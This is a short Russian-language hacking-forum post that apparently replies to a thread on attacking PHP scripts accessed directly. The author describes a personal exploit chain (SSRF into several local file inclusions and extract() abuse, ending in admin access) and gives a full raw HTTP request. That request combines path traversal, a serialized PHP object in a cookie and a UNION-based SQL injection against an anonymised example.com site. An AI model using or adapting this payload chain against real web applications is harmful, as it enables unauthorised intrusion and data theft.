
02.11.2021, 12:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
Вторым
возможным вектором может быть обращение к скриптам напрямую.
Это могут файлы шаблонов, обособленные скриптовые файлы не использующие
пользовательские классы или имеющие уязвимости до того как скрипт упадет
из-за вызова неизвестного метода.
Отличная заметка и отличный вектор атаки. Недавно публиковал сплоит, как раз из этой оперы. Стоит отметить, что не стоит ограничиваться одним действием, мыслим шире и включаем фантазию. Составляем чейны из N инклудов или иных уязвимостей. К примеру, кейс из личного опыта:
SSRF => LFI (.php) => LFI (.php) + LFI (.php) + extract() => LFI (.php) = Admin (FW, SQLi, etc)
Код:
Code:
POST /trans/transfer.php?er,http://dev.example.com/?route=main.page&state_code=/*xxx/../../../../../../../../../../../../../../../../vol1/sites/projects/example-final/trunk/api/www/billing/paypal HTTP/1.1
Host: www.example.com
Cookie: example_state=a:1:{i:0;O:25:"billing_include_subscribe":0:{}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4147.105 Safari/537.36
Content-Type: application/x-www-form-urlencoded
RESULT_MAIN=0&product_id=12345&s=us-/../../../../admin/www/view_tour-1&v=/../../../../../../../../../../../../vol1/sites/projects/example-final/trunk/admin/www/view_tour&state_code=12345' union select 1,2,3,4,5,6,7,8,9 -- 1
|
|
|
|